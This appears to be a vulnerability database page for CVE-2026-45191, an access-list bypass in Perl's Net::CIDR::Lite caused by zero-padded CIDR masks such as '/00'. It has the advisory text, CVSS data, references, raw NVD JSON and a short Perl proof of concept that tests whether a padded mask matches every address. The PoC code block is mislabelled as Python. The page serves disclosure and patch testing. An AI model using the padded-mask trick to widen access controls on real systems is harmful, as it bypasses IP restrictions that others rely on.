CVE-2026-45191

Description

Net::CIDR::Lite versions before 0.24 for Perl does not properly consider extraneous zero characters in CIDR mask values, which may allow IP ACL bypass. Mask forms like "/00" and "/01" pass validation and parse to the same prefix as their unpadded value. See also CVE-2026-45190.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Net::CIDR::Lite < 0.24

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/perl
# PoC for CVE-2026-45191: Net::CIDR::Lite ACL Bypass via leading zeros
use strict;
use warnings;
use Net::CIDR::Lite;

print "[+] Testing for CVE-2026-45191 in Net::CIDR::Lite\n";

my $cidr = Net::CIDR::Lite->new;

# Attempt to add a CIDR range with a padded zero mask ('/00').
# In vulnerable versions (< 0.24), this passes validation.
# '/00' parses to '/0' (0.0.0.0/0), effectively allowing any IP.

eval {
    $cidr->add("192.168.1.0/00");
};

if ($@) {
    print "[-] Validation rejected '/00'. Module might be patched.\n";
} else {
    print "[!] Validation accepted '/00'. Checking range interpretation...\n";

    # Check if an arbitrary IP outside the intended '192.168.1.0/24' range matches.
    # If '/00' is parsed as '/0', 8.8.8.8 should match.
    my $test_ip = "8.8.8.8";
    if ($cidr->find($test_ip)) {
        print "[+] VULNERABLE: IP '$test_ip' matched range '192.168.1.0/00'.\n";
        print "    This implies '/00' was parsed as '/0', allowing ACL bypass.\n";
    } else {
        print "[-] IP '$test_ip' did not match. Behavior might be safe or different.\n";
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45191
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45191
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45191/
[4] VulDB https://vuldb.com/cve/CVE-2026-45191
[5] https://github.com/stigtsp/Net-CIDR-Lite/commit/24e2c439ec405e5256024b9acefd4f7008c5ed0c.patch
[6] https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.24/changes
[7] https://www.cve.org/CVERecord?id=CVE-2026-45190

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45191", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-10T21:16:29.380", "lastModified": "2026-05-12T16:48:58.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::CIDR::Lite versions before 0.24 for Perl does not properly consider extraneous zero characters in CIDR mask values, which may allow IP ACL bypass.\n\nMask forms like \"/00\" and \"/01\" pass validation and parse to the same prefix as their unpadded value.\n\nSee also CVE-2026-45190."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1289"}]}], "references": [{"url": "https://github.com/stigtsp/Net-CIDR-Lite/commit/24e2c439ec405e5256024b9acefd4f7008c5ed0c.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.24/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-45190", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}]}}